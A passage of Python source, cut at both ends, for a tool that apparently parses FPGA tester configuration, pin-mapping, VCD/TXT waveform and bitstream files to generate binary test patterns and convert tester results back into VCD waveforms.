tick=0):\n\t\"\"\"\n\tformat:\n\t\tflag = 'const': value = 0/1, default = (don't care)\n\t\tflag = 'square': value = (don't care), default = 0/1\n\t\tflag = 'T': value=[[number1, 0/1], [number2, 0/1], ...], default = 0/1\n\t:param dictionary:\n\t:param tick:\n\t:return:\n\t\"\"\"\n\tvalue = dictionary.setdefault('value', 0)\n\tflag = dictionary.setdefault('flag', 'const')\n\tdefault = dictionary.setdefault('default', 0)\n\tif flag == 'const':\n\t\treturn value\n\tif flag == 'square':\n\t\treturn (tick + default) % 2\n\tif flag == 'T':\n\t\tvp = default\n\t\tfor t, v in value:\n\t\t\tif tick >= t:\n\t\t\t\tvp = v\n\t\t\telse:\n\t\t\t\treturn vp\n\t\treturn vp\n\n\ndef timescale_op(ts):\n\tregex = re.compile(r'(\\d+)(\\w*)', re.I)\n\tm = regex.match(ts)\n\tif m:\n\t\tunit = m.group(2)\n\t\tif unit == 'p' or unit == 'ps':\n\t\t\tmultiplier = 1\n\t\telif unit == 'n' or unit == 'ns':\n\t\t\tmultiplier = 1000\n\t\telse:\n\t\t\tmultiplier = 1000000\n\t\tts_int = int(m.group(1)) * multiplier\n\telse:\n\t\tts_int = 1\n\treturn ts_int\n\n\ndef find_diff(x, y):\n\t# Compare two integers and return the difference.\n\tbit2val = {}\n\txor = x ^ y\n\tfor i in range(8):\n\t\tif (1 << i) & xor:\n\t\t\tbit2val[i] = (x >> i) & 1\n\treturn bit2val\n\n\ndef get_symbol(signal, sig2sym):\n\tif signal in sig2sym:\n\t\treturn sig2sym[signal]\n\telse:\n\t\tfor key in sig2sym:\n\t\t\tif signal in key:\n\t\t\t\treturn sig2sym[key]\n\t\treturn None\n\n\ndef expand_bus(sorted_sym2sig):\n\toffset = 0\n\tsorted_exp_sym2sig = []\n\tfor sym, sig in sorted_sym2sig:\n\t\tif isinstance(sig, tuple):\n\t\t\tbus, msb, lsb = sig\n\t\t\tstep = msb > lsb and -1 or 1\n\t\t\tfor i in range(msb, lsb+step, step):\n\t\t\t\tsorted_exp_sym2sig.append((sym, '{}[{}]'.format(bus, i)))\n\t\t\t\tsym = chr(ord(sym) + 1)\n\t\t\toffset += abs(msb-lsb)\n\t\telse:\n\t\t\tsym = chr(ord(sym) + offset)\n\t\t\tsorted_exp_sym2sig.append((sym, sig))\n\treturn sorted_exp_sym2sig\n\n\ndef tfo_parser(path, file):\n\t\"\"\"\n\t:param path:\n\t:param file:\n\t:return file_list_list:\n\t\"\"\"\n\tfile_list_list = {}\n\tsoup = get_soup(path, file)\n\tname_check(file, soup.TFO['name'])\n\tfor test_tag in soup.find_all('TEST'):\n\t\tfile_list = {\n\t\t\t'PTN': test_tag['name'] + '.ptn',\n\t\t\t'LBF': soup.TFO.LBF['type'] + '.lbf',\n\t\t\t'TCF': 'F93K.tcf'\n\t\t}\n\t\tproject_name = test_tag['name']\n\t\tfor child in test_tag.children:\n\t\t\tif type(child) == bs4.element.Tag:\n\t\t\t\tif child.name == 'DWM' or child.name == 'BIT':\n\t\t\t\t\tfile_list[child.name] = child['name']\n\t\t\t\telse:\n\t\t\t\t\tfile_list[child.name] = child['name'] + '.' + child.name.lower()\n\t\tfile_list_list[test_tag['path']] = (project_name, file_list)\n\tprint(file_list_list)\n\treturn file_list_list\n\n\nclass PatternGen(object):\n\t# path and file\n\tproject_name = ''\n\tpath = '.'\n\t# command = []\n\tinclude_path = os.path.join(DIRECTORY, INCLUDE_PATH)\n\tfile_list = {'TCF': 'F93K.tcf', 'ATF': 'test_tri.atf'}\n\tconfig = {'sr': 1, 'command': 'normal'} # Sample rate from .tcf file\n\n\t# variable\n\ttick = 0 # write clock\n\tbs_start = 0 # start of bitstream\n\tcclk_pos = (0, 0) # position of cclk, used for writing nop\n\tlast_pos2val = {} # record the infomation of last content\n\ttrf_param = {'vcd_list': [], 'bs_len': 0} # parameter for trf2vcd()\n\tdigital_param = {'period': '1u', 'multiple': 1} # parameter from ITM file\n\ttotal_length = 0 # global counter of the pattern\n\tbase_0 = []\n\tbase_1 = []\n\n\t# signal dictionary\n\tcmd2spio = {}\n\tcmd2pos = {}\n\tcmd2flag = {}\n\tpos2data = {}\n\tnop = {}\n\n\tsig2pio = {}\n\tsig2pos = {}\n\tsym2sig = {}\n\tentri_dict = {}\n\n\tdef __init__(self, path='.', tfo_file='tfo_demo', command='-normal', file_list=()):\n\t\tself.project_name = path\n\t\tself.path = os.path.join(DIRECTORY, path)\n\t\t# self.command = command.split('-') # Get command: -normal, -legacy, ...\n\t\tself.config['command'] = command.split('-') # Get command: -normal, -legacy, ...\n\t\tif file_list:\n\t\t\tself.project_name, self.file_list = file_list\n\t\telse:\n\t\t\tself.tfo_parser(tfo_file) # Get position of user files.\n\t\tself.atf_parser(self.file_list['ATF']) # Get position of include files.\n\t\tself.itm_parser(self.file_list['ITM'])\n\t\t# print(self.file_list)\n\n\t\t# initialize bitstream infolf.cmd2spio, whatever = self.pio_parser(self.include_path, self.file_list['SPIO'])\n\t\tself.cmd2spio, whatever = self.pio_parser(self.include_path, self.file_list['SPIO'])\n\t\tcmd2pin = self.ucf_parser(self.include_path, self.file_list['SUCF'])\n\t\tcmd2channel = self.lbf_parser(self.file_list['LBF'], cmd2pin)\n\t\tself.cmd2pos = self.tcf_parser(self.file_list['TCF'], cmd2channel)\n\t\tself.sbc_parser(self.file_list['SBC'])\n\t\tself.cclk_pos = self.cmd2pos['CCLK']\n\n\t\t# initialize testbench info\n\t\tself.sig2pio, self.entri_dict = self.pio_parser(self.path, self.file_list['PIO'])\n\t\tsig2pin = self.ucf_parser(self.path, self.file_list['UCF'])\n\t\tsig2channel = self.lbf_parser(self.file_list['LBF'], sig2pin)\n\t\tself.sig2pos = self.tcf_parser(self.file_list['TCF'], sig2channel)\n\n\t\t# get symbol2signal dictionary from vcd/txt file\n\t\tself.sym2sig = self.get_sym2sig()\n\n\tdef tfo_parser(self, file):\n\t\t\"\"\"\n\t\tTODO: Multiple TEST tag, different attr 'name' and 'path'.\n\t\tTODO: Return file_dict like {test1:{path:'path', file1:'file1', ...}, test2:{...}, ...}.\n\t\tFormat: {\"lbf\":\"LB010tf1\", dut:\"LX200\", \"test\":{\"pin_test\":{\"path\":\".\", }}}\n\t\t:param file:\n\t\t:return file_dict:\n\t\t\"\"\"\n\t\tsoup = get_soup(self.path, file)\n\t\tname_check(file, soup.TFO['name'])\n\t\tself.file_list['LBF'] = soup.TFO.LBF['type'] + '.lbf'\n\t\ttest_tag = soup.find('TEST')\n\t\tself.project_name = test_tag['name']\n\t\tself.file_list['PTN'] = test_tag['name'] + '.ptn'\n\t\t# self.path = test_tag['path']\n\t\tfor child in test_tag.children:\n\t\t\tif type(child) == bs4.element.Tag:\n\t\t\t\tif child.name == 'DWM' or child.name == 'BIT':\n\t\t\t\t\tself.file_list[child.name] = child['name']\n\t\t\t\telse:\n\t\t\t\t\tself.file_list[child.name] = child['name'] + '.' + child.name.lower()\n\n\tdef itm_parser(self, file):\n\t\tsoup = get_soup(self.path, file)\n\t\tname_check(file, soup.ITEM['name'])\n\t\t# print(type(soup.find('DIGITAL').CYCLE))\n\t\tself.digital_param['period'] = soup.find('DIGITAL').CYCLE.get('period')\n\t\t# self.digital_param['period'] = soup.find('DIGITAL').CYCLE.setdefault('period', '1u')\n\t\t# self.digital_param['multiple'] = soup.find('DIGITAL').CYCLE.setdefault('multiple', '1')\n\n\t@staticmethod\n\tdef pio_parser(path, file):\n\t\tpio_dict = {}\n\t\tentri_dict = {}\n\t\tpath = os.path.join(path, file)\n\t\tregex = re.compile(r'NET\\s+\"(.+)\"\\s+DIR\\s*=\\s*(input|output|inout)(.*);', re.I)\n\t\tregex2 = re.compile(r'.*\"(.*)\"\\s*')\n\t\twith open(path, \"r\") as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\tm = regex.match(line)\n\t\t\t\tif m:\n\t\t\t\t\t# print(m.groups())\n\t\t\t\t\tio = m.group(2).lower()\n\t\t\t\t\tpio_dict[m.group(1)] = io\n\t\t\t\t\tif io == 'inout':\n\t\t\t\t\t\ttri = regex2.match(m.group(3)).group(1)\n\t\t\t\t\t\tif tri not in entri_dict:\n\t\t\t\t\t\t\tentri_dict[tri] = [m.group(1)]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tentri_dict[tri].append(m.group(1))\n\t\t# print(pio_dict, entri_dict)\n\t\treturn pio_dict, entri_dict\n\n\t@staticmethod\n\tdef ucf_parser(path, file):\n\t\tsig2pin = {}\n\t\tpath = os.path.join(path, file)\n\t\tregex = re.compile(r'NET\\s+\"(.+)\"\\s+LOC =(.+);', re.I)\n\t\twith open(path, \"r\") as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\tm = regex.match(line)\n\t\t\t\tif m:\n\t\t\t\t\tsig2pin[m.group(1)] = m.group(2).strip()\n\t\treturn sig2pin\n\n\tdef atf_parser(self, file):\n\t\t# print(self.path)\n\t\tsoup = get_soup(self.path, file)\n\t\tname_check(file, soup.ATF['name'])\n\t\tdwm_tag = soup.ATF.LIST.DWM\n\t\tfor child in dwm_tag.children:\n\t\t\tif type(child) == bs4.element.Tag:\n\t\t\t\tself.file_list[child.name] = child['name'] + '.' + child.name.lower()\n\n\tdef lbf_parser(self, file, sig2pin):\n\t\tsoup = get_soup(self.include_path, file)\n\t\tname_check(file, soup.LBF['name'])\n\t\t# dut_tag = soup.find('DUT').children\n\t\tsig2channel = {}\n\t\tfor key in sig2pin:\n\t\t\tconnect_tag = soup.find(pin=sig2pin[key])\n\t\t\tif connect_tag: # collect exception\n\t\t\t\tsig2channel[key] = connect_tag['channel']\n\t\t\telse:\n\t\t\t\tsig2channel[key] = None\n\t\treturn sig2channel\n\n\tdef tcf_parser(self, file, sig2channel):\n\t\tsoup = get_soup(self.include_path, file)\n\t\tname_check(file, soup.TCF['name'])\n\t\tsig2pos = {}\n\t\tfor key, value in sig2channel.items():\n\t\t\t# FRAME & ASSEMBLY tag\n\t\t\tconnect_tag = soup.find(pogo=value[:3])\n\t\t\tassembly_name = connect_tag['assembly'] # should search by 'AS0101',\n\t\t\twire_tag = soup.find(code=assembly_name).find(pogopin=value[3:]) # not this\n\t\t\tchannel = connect_tag['plug'] + wire_tag['plugpin']\n\n\t\t\tself.config['sr'] = int(soup.find('CARD').get('samplerate') or DEFAULT_SR) # Get sample rate, default is 1\n\n\t\t\t# SIGMAP tag\n\t\t\tmapping_tag = soup.find(channel=channel)\n\t\t\tbyte = int(mapping_tag['byte'])\n\t\t\tbit = int(mapping_tag['bit'])\n\t\t\tsig2pos[key] = (byte, bit)\n\t\treturn sig2pos\n\n\tdef txt_parser(self, fw):\n\t\ttb_counter = -1 # length of test bench in operation code\n\t\t# def_state = True # definition state\n\t\tx_val = 0 # default value of x\n\t\tz_val = 0\n\t\tperiod = self.digital_param['period_int']\n\t\tpos2val = {} # {position(bit): signal(1|0|z|x)}\n\t\tpath = os.path.join(self.path, self.file_list['TXT'])\n\t\t# regex1 = re.compile(r'(.)\\s+(.*)\\s+(input|output)', re.I) # match signal name\n\t\t# regex1 = re.compile(r'(.)\\s+(\\w+)\\s*(\\[(\\d+)(:?)(\\d*)\\])?\\s+(input|output)', re.I) # match signal name\n\t\tregex2 = re.compile(r'^\\*{10}') # match period partition\n\t\tregex3 = re.compile(r'(.)\\s+b([0|1|x|z]+)') # match test bench\n\n\t\twith open(path, \"r\") as f:\n\t\t\tif not self.entri_dict:\n\t\t\t\twrite_mask(fw, self.sig2pos, self.sig2pio)\n\t\t\t\twrite_operator(fw, TESTBENCH_OP, 0)\n\t\t\t\tself.total_length += 3\n\t\t\tline = 1\n\t\t\twhile line:\n\t\t\t\tline = f.readline()\n\t\t\t\t# match next tick; write last tick to file\n\t\t\t\tm2 = regex2.match(line)\n\t\t\t\tif m2 and regex2.match(f.readline()): # skip 2nd star row # WARNING\n\t\t\t\t\t# print('write')\n\t\t\t\t\t# print(pos2val)\n\t\t\t\t\twrite_content(fw, pos2val) # Write testbench to binary file. Skip the first * line.\n\t\t\t\t\ttb_counter += 1\n\t\t\t\t\tself.total_length += 1\n\t\t\t\t\tcontinue\n\n\t\t\t\t# match testbench\n\t\t\t\tm3 = regex3.match(line)\n\t\t\t\tif m3:\n\t\t\t\t\tkey = m3.group(1)\n\t\t\t\t\tif key not in self.sym2sig:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tvalue = m3.group(2)\n\t\t\t\t\tif isinstance(self.sym2sig[key], tuple):\n\t\t\t\t\t\tbus_ele = self.sym2sig[key]\n\t\t\t\t\t\tbus_width = bus_ele[1] - bus_ele[2]\n\t\t\t\t\t\tbus_signal = bus_width > 0 and 1 or -1\n\t\t\t\t\t\tvalue = '0' * (abs(bus_width) - len(value)) + value # Fill 0 on the left\n\t\t\t\t\t\tfor i in range(0, bus_width + bus_signal, bus_signal):\n\t\t\t\t\t\t\tbus_sig = '{}[{}]'.format(bus_ele[0], str(bus_ele[1] - i))\n\t\t\t\t\t\t\tpos2val[self.sig2pos.setdefault(bus_sig, None)] = value[abs(i)]\n\t\t\t\t\t# print('signal = %s, value = %s' % (bus_sig, value[abs(i)]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value == 'x':\n\t\t\t\t\t\t\tvalue = x_val\n\t\t\t\t\t\tif value == 'z':\n\t\t\t\t\t\t\tvalue = z_val\n\t\t\t\t\t\tpos2val[self.sig2pos.setdefault(self.sym2sig[key], None)] = value\n\t\t\t\t\tif self.sym2sig[key] in self.entri_dict:\n\t\t\t\t\t\tentri_list = self.entri_dict[self.sym2sig[key]]\n\t\t\t\t\t\tfor entri in entri_list:\n\t\t\t\t\t\t\tif value == '1':\n\t\t\t\t\t\t\t\tself.sig2pio[entri] = 'output'\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.sig2pio[entri] = 'input'\n\t\t\t\t\t\twrite_length(fw, tb_counter)\n\t\t\t\t\t\t# self.trf_param['vcd_list'].append(tb_counter) # txt length is inaccurate\n\t\t\t\t\t\twrite_mask(fw, self.sig2pos, self.sig2pio)\n\t\t\t\t\t\twrite_operator(fw, TESTBENCH_OP, 0)\n\t\t\t\t\t\tself.total_length += 3\n\t\t\t\t\t\ttb_counter = 0\n\t\t\twrite_content(fw, pos2val)\n\t\t\ttb_counter += 1\n\t\t\tself.total_length += 1\n\t\t\t# print(tb_counter)\n\t\t\twrite_length(fw, tb_counter)\n\n\tdef vcd_parser(self, fw):\n\t\ttick = -1 # current tick\n\t\ttb_counter = -1 # length of testbench in operation code\n\t\tx_val = 0 # default value of x\n\t\tz_val = 0\n\t\tperiod = self.digital_param['period_int']\n\t\tvcd_list = []\n\t\tpos2val = {} # {position(bit): signal(1|0|z|x)}\n\t\tpath = os.path.join(self.path, self.file_list['VCD'])\n\t\tregex2 = re.compile(r'#(\\d+)') # match period\n\t\tregex3 = re.compile(r'b?([0|1|x|z]+)\\s*(.)') # match testbench\n\n\t\twith open(path, \"r\") as f:\n\t\t\tif not self.entri_dict:\n\t\t\t\twrite_mask(fw, self.sig2pos, self.sig2pio)\n\t\t\t\twrite_operator(fw, TESTBENCH_OP, 0)\n\t\t\t\tself.total_length += 3\n\t\t\tfor line in f.readlines():\n\t\t\t\t# end of file\n\t\t\t\tif line[:8] == '$dumpoff':\n\t\t\t\t\tbreak\n\t\t\t\t# match next tick; write last tick to file\n\t\t\t\tm2 = regex2.match(line)\n\t\t\t\tif m2:\n\t\t\t\t\tvcd_tick_raw = int(m2.group(1))\n\t\t\t\t\tif vcd_tick_raw % period: # small delay, skip the write operation\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tvcd_tick = int(vcd_tick_raw / period)\n\t\t\t\t\twhile True:\n\t\t\t\t\t\twrite_content(fw, pos2val) # Write testbench to binary file.\n\t\t\t\t\t\ttb_counter += 1\n\t\t\t\t\t\ttick += 1\n\t\t\t\t\t\tself.total_length += 1\n\t\t\t\t\t\tif tick == vcd_tick:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tcontinue\n\t\t\t\t# if m2:\n\t\t\t\t# \tvcd_tick = m2.group(1)\n\t\t\t\t# \twhile True:\n\t\t\t\t# \t\twrite_content(fw, pos2val) # Write testbench to binary file.\n\t\t\t\t# \t\ttb_counter += 1\n\t\t\t\t# \t\ttick += 1\n\t\t\t\t# \t\tself.total_length += 1\n\t\t\t\t# \t\tif tick == int(vcd_tick):\n\t\t\t\t# \t\t\tbreak\n\t\t\t\t# \tcontinue\n\n\t\t\t\t# match testbench\n\t\t\t\tm3 = regex3.match(line)\n\t\t\t\tif m3:\n\t\t\t\t\tvalue = m3.group(1)\n\t\t\t\t\tkey = m3.group(2)\n\t\t\t\t\tif key not in self.sym2sig:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t# pos2val[self.sig2pos.setdefault(self.sym2sig[key], None)] = value\n\t\t\t\t\tif isinstance(self.sym2sig[key], tuple):\n\t\t\t\t\t\tbus_ele = self.sym2sig[key]\n\t\t\t\t\t\tbus_width = bus_ele[1] - bus_ele[2]\n\t\t\t\t\t\t# print(\"{} {}\".format(bus_width, bus_ele))\n\t\t\t\t\t\tbus_signal = bus_width > 0 and 1 or -1\n\t\t\t\t\t\tvalue = '0' * (abs(bus_width) + 1 - len(value)) + value # Fill 0 on the left\n\t\t\t\t\t\tfor i in range(0, bus_width + bus_signal, bus_signal):\n\t\t\t\t\t\t\tbus_sig = '{}[{}]'.format(bus_ele[0], str(bus_ele[1] - i))\n\t\t\t\t\t\t\t# print(\"tick={} {} {}\".format(tick, bus_sig, self.sig2pos))\n\t\t\t\t\t\t\t# print(\"i={}, value={}\".format(i, value))\n\t\t\t\t\t\t\tpos2val[self.sig2pos.setdefault(bus_sig, None)] = value[abs(i)]\n\t\t\t\t\t\t\t# print('ok')\n\t\t\t\t\t# print('signal = %s, value = %s' % (bus_sig, value[abs(i)]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value == 'x':\n\t\t\t\t\t\t\tvalue = x_val\n\t\t\t\t\t\tif value == 'z':\n\t\t\t\t\t\t\tvalue = z_val\n\t\t\t\t\t\tpos2val[self.sig2pos.setdefault(self.sym2sig[key], None)] = value\n\t\t\t\t\tif self.sym2sig[key] in self.entri_dict:\n\t\t\t\t\t\tentri_list = self.entri_dict[self.sym2sig[key]]\n\t\t\t\t\t\tfor entri in entri_list:\n\t\t\t\t\t\t\tif value == '1':\n\t\t\t\t\t\t\t\tself.sig2pio[entri] = 'output'\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.sig2pio[entri] = 'input'\n\t\t\t\t\t\twrite_length(fw, tb_counter)\n\t\t\t\t\t\tif tb_counter:\n\t\t\t\t\t\t\tvcd_list.append(tb_counter)\n\t\t\t\t\t\twrite_mask(fw, self.sig2pos, self.sig2pio)\n\t\t\t\t\t\twrite_operator(fw, TESTBENCH_OP, 0)\n\t\t\t\t\t\tself.total_length += 3\n\t\t\t\t\t\ttb_counter = 0\n\t\t\twrite_length(fw, tb_counter)\n\t\t\tvcd_list.append(tb_counter)\n\t\t\tself.trf_param['vcd_list'] = vcd_list\n\t\t\tself.trf_param['vcd_len'] = tick + 2 * (len(vcd_list) - 1) # Warning\n\n\tdef sbc_parser(self, file):\n\t\tsoup = get_soup(self.include_path, file)\n\t\tname_check(file, soup.SBC['name'])\n\n\t\t# Handle SIG tag\n\t\tfor element in soup.find_all('SIG'):\n\t\t\tele_value = element['value']\n\t\t\tregex1 = re.compile(r'(const)([0|1])') # flag = const\n\t\t\tm1 = regex1.search(ele_value) # const has the highest priority\n\t\t\tif m1:\n\t\t\t\tflag, value = m1.groups()\n\t\t\t\tvalue = int(value)\n\t\t\telse:\n\t\t\t\tregex2 = re.compile(r'^(square)(\\d+)T$') # flag = square\n\t\t\t\tm2 = regex2.match(ele_value)\n\t\t\t\tif m2:\n\t\t\t\t\tflag, value = m2.groups()\n\t\t\t\t\tvalue = int(value)\n\t\t\t\telse:\n\t\t\t\t\tregex3 = re.compile(r'(\\d+)T([0|1])') # flag = T\n\t\t\t\t\tm3 = regex3.findall(ele_value)\n\t\t\t\t\tif m3:\n\t\t\t\t\t\tvalue = [list(map(int, x)) for x in m3]\n\t\t\t\t\t\tflag = 'T'\n\t\t\t\t\telse: # collect default\n\t\t\t\t\t\tflag = ''\n\t\t\t\t\t\tvalue = 0\n\t\t\tdefault = int(element['default'])\n\t\t\tself.cmd2flag[element['name']] = {'value': value, 'flag': flag, 'default': default}\n\n\t\t# Handle BTC tag\n\t\tbtc_tag = soup.find('BTC')\n\t\tself.bs_start = int(btc_tag['start'][:-1])\n\t\tfor child in btc_tag.find_all('DATA'):\n\t\t\tnum = (int(child['byte']) - 1) * 8 + 7 - int(child['bit'])\n\t\t\tself.pos2data[num] = child['name']\n\n\t\t# Handle NOP tag\n\t\tnop_tag = soup.find('NOP')\n\t\tself.nop['start'] = nop_tag['start']\n\t\tself.nop['cycle'] = int(nop_tag['cycle'][:-1])\n\n\tdef rbt_generator(self, file):\n\t\t\"\"\"\n\t\tGenerator, yield the position of bitstream.\n\t\t:return:\n\t\t\"\"\"\n\t\tpath = os.path.join(self.path, file)\n\t\twith open(path, 'r') as f:\n\t\t\tfor i in range(7): # skip the first 7 lines\n\t\t\t\tf.readline()\n\t\t\twhile True:\n\t\t\t\tline = f.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tyield line\n\n\tdef get_sym2sig(self): # get sym2val and timescale from VCD file\n\t\tsym2sig = {}\n\t\tif 'legacy' in self.config['command']:\n\t\t\tpath = os.path.join(self.path, self.file_list['TXT'])\n\t\t\tregex1 = re.compile(r'(.)\\s+(\\w+)\\s*(\\[(\\d+)(:?)(\\d*)\\])?\\s+(input|output)', re.I)\n\t\t\tregex2 = re.compile(r'^\\*{10}')\n\t\telse:\n\t\t\tpath = os.path.join(self.path, self.file_list['VCD'])\n\t\t\tregex1 = re.compile(r'\\$var\\s+\\w+\\s+\\d+\\s+(.)\\s+(\\w+)\\s*(\\[(\\d+)(:?)(\\d*)\\])?\\s+\\$end', re.I)\n\t\t\tregex2 = re.compile(r'\\$enddefinitions \\$end')\n\t\tregex3 = re.compile(r'\\$timescale')\n\t\twith open(path, \"r\") as f:\n\t\t\tline = f.readline()\n\t\t\twhile line:\n\t\t\t\tif regex2.match(line): # definition end\n\t\t\t\t\tbreak\n\t\t\t\tif regex3.match(line): # get timescale\n\t\t\t\t\tm3 = re.match(r'\\s*(\\d+\\w+)\\s*', f.readline())\n\t\t\t\t\ttimescale = m3.group(1)\n\t\t\t\t\tself.digital_param['period_int'] = int(timescale_op(self.digital_param['period']) / timescale_op(timescale))\n\t\t\t\t\t# print(self.digital_param['period_int'], type(self.digital_param['period_int']))\n\t\t\t\tm = regex1.match(line)\n\t\t\t\tif m:\n\t\t\t\t\tif m.group(5): # Combined bus\n\t\t\t\t\t\tmsb = int(m.group(4))\n\t\t\t\t\t\tlsb = int(m.group(6))\n\t\t\t\t\t\tsym2sig[m.group(1)] = (m.group(2), msb, lsb) # symbol => (bus, MSB, LSB)\n\t\t\t\t\telif m.group(3):\n\t\t\t\t\t\tsym2sig[m.group(1)] = m.group(2) + m.group(3)\n\t\t\t\t\telif m.group(2) not in self.sig2pos.keys():\n\t\t\t\t\t\tline = f.readline()\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tsym2sig[m.group(1)] = m.group(2)\n\t\t\t\tline = f.readline()\n\t\treturn sym2sig\n\n\tdef edge_check(self, fw):\n\t\tif self.last_pos2val[self.cclk_pos] == 0:\n\t\t\tself.last_pos2val[self.cclk_pos] = 1\n\t\t\twrite_content(fw, self.last_pos2val)\n\t\t\tself.tick += 1\n\t\t\tself.total_length += 1\n\n\tdef get_bus_val(self, line_tuple, bus):\n\t\tbus_width = bus[1] - bus[2]\n\t\tbus_signal = bus_width > 0 and 1 or -1\n\t\tval = 'b'\n\t\tfor i in range(0, bus_width + bus_signal, bus_signal):\n\t\t\tbus_sig = '{}[{}]'.format(bus[0], str(bus[1] - i))\n\t\t\tbus_pos = self.sig2pos[bus_sig]\n\t\t\tbus_val = (line_tuple[bus_pos[0] - 1] >> bus_pos[1]) & 1\n\t\t\tval = val + str(bus_val)\n\t\treturn val + ' '\n\n\tdef trf2vcd(self, trf, vcd, flag=None):\n\t\ttick = 0\n\t\torder = 0\n\t\tpath_trf = os.path.join(self.path, trf)\n\t\tpath_pruned_trf = os.path.join(self.path, 'pruned_' + trf)\n\t\tpath_vcd = os.path.join(self.path, vcd)\n\t\tpos2sig = {v: k for k, v in self.sig2pos.items()}\n\t\tsig2sym = {v: k for k, v in self.sym2sig.items()}\n\t\tsorted_sym2sig_key = sorted(self.sym2sig)\n\t\tsorted_sym2sig = list(map(lambda x: (x, self.sym2sig[x]), sorted_sym2sig_key))\n\t\tsorted_exp_sym2sig = expand_bus(sorted_sym2sig) # for simple vcd2pic (expand bus)\n\t\ttitle = {\n\t\t\t'date': time.asctime(time.localtime(time.time())),\n\t\t\t'version': 'ModelSim Version 10.1c',\n\t\t\t'timescale': '1us'\n\t\t}\n\t\t# Prepare param for trf abandon\n\t\tif flag == 'bypass': # load length of vcd and bs from json file\n\t\t\tself.load_temp()\n\t\tvcd_len = self.trf_param['vcd_len']\n\t\tbs_len = self.trf_param['bs_len']\n\t\tx1 = 2048 - (bs_len + 3) % 2048 - 3\n\t\tif vcd_len <= 2048:\n\t\t\tend_tick = vcd_len + 1\n\t\telse:\n\t\t\tend_tick = 2049 + vcd_len - x1\n\n\t\twith open(path_trf, 'rb') as ft, open(path_vcd, 'w') as fv, open(path_pruned_trf, 'wb') as fp:\n\t\t\tfor item in title:\n\t\t\t\tfv.write('${}\\n\\t{}\\n$end\\n'.format(item, title[item]))\n\t\t\tfv.write('$scope module {}_tb $end\\n'.format(self.project_name))\n\t\t\t# Signal definition. Copy the original vcd file.\n\t\t\t# for symbol, signal in self.sym2sig.items():\n\t\t\t# print(sorted_sym2sig)\n\t\t\tfor symbol, signal in sorted_sym2sig:\n\t\t\t\tprint(symbol, signal)\n\t\t\t\tif isinstance(signal, tuple):\n\t\t\t\t\tio = self.sig2pio['{}[{}]'.format(signal[0], signal[1])] == 'input' and 'reg' or 'wire'\n\t\t\t\t\tsignal, width = '{}[{}:{}]'.format(signal[0], signal[1], signal[2]), abs(signal[1] - signal[2] + 1)\n\t\t\t\telse:\n\t\t\t\t\twidth = 1\n\t\t\t\t\tio = self.sig2pio[signal] == 'input' and 'reg' or 'wire'\n\t\t\t\tfv.write('$var {} {} {} {} $end\\n'.format(io, width, symbol, signal))\n\t\t\tfv.write('$upscope $end\\n$enddefinitions $end\\n')\n\t\t\tline = ft.read(BIN_BYTE_WIDTH) # Bytes type\n\t\t\tlast_line = None\n\t\t\twhile line:\n\t\t\t\tif tick > end_tick:\n\t\t\t\t\tfv.write('#{}'.format(order))\n\t\t\t\t\tbreak\n\t\t\t\telif 1 < tick < x1 or tick >= 2048:\n\t\t\t\t\tsym2val = {}\n\t\t\t\t\tline_tuple = struct.unpack('>' + 'B' * 16, line)\n\t\t\t\t\tfp.write(line) # generate pruned TRF file\n\t\t\t\t\tif not last_line: # first line\n\t\t\t\t\t\tfv.write('#{}\\n$dumpvars\\n'.format(order))\n\t\t\t\t\t\tfor sym, sig in self.sym2sig.items():\n\t\t\t\t\t\t\tif isinstance(sig, tuple):\n\t\t\t\t\t\t\t\tsym2val[sym] = self.get_bus_val(line_tuple, sig)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tpos = self.sig2pos.get(sig)\n\t\t\t\t\t\t\t\tif pos:\n\t\t\t\t\t\t\t\t\tsym2val[sym] = (line_tuple[pos[0] - 1] >> pos[1]) & 1\n\t\t\t\t\t\tfor sym, val in sym2val.items(): # Write all symbol + value together.\n\t\t\t\t\t\t\tfv.write('{}{}\\n'.format(val, sym))\n\t\t\t\t\t\tfv.write('$end\\n')\n\t\t\t\t\telif line != last_line:\n\t\t\t\t\t\tfv.write('#{}\\n'.format(order))\n\t\t\t\t\t\tlast_line_tuple = struct.unpack('>' + 'B' * 16, last_line)\n\t\t\t\t\t\tdiff = map(find_diff, line_tuple, last_line_tuple) # Return a list of dictionary.\n\t\t\t\t\t\tfor i, byte_dict in enumerate(diff):\n\t\t\t\t\t\t\tfor bit, val in byte_dict.items():\n\t\t\t\t\t\t\t\tpos = (i + 1, bit)\n\t\t\t\t\t\t\t\tsig = pos2sig.setdefault(pos, 0) # Signal name, string.\n\t\t\t\t\t\t\t\tif sig == 0:\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\telif sig in sig2sym: # Normal signal or distributed bus signal.\n\t\t\t\t\t\t\t\t\tsym2val[sig2sym[sig]] = val\n\t\t\t\t\t\t\t\telse: # Concentrated bus signal\n\t\t\t\t\t\t\t\t\tfor key in sig2sym:\n\t\t\t\t\t\t\t\t\t\tif re.sub(r'\\[\\d+\\]', '', sig) in key:\n\t\t\t\t\t\t\t\t\t\t\tsym2val[sig2sym[key]] = self.get_bus_val(line_tuple, key)\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tfor sym, val in sym2val.items():\n\t\t\t\t\t\t\tfv.write('{}{}\\n'.format(val, sym))\n\t\t\t\t\tlast_line = line\n\t\t\t\t\torder += 1\n\t\t\t\tline = ft.read(BIN_BYTE_WIDTH)\n\t\t\t\ttick += 1\n\n\tdef compare_trf(self, ptn, trf):\n\t\t# compare trf and ptn file, generate report.\n\t\tpos2sig = {v: k for k, v in self.sig2pos.items()}\n\t\tsig2sym = {v: k for k, v in self.sym2sig.items()}\n\t\tpath_ptn = os.path.join(self.path, 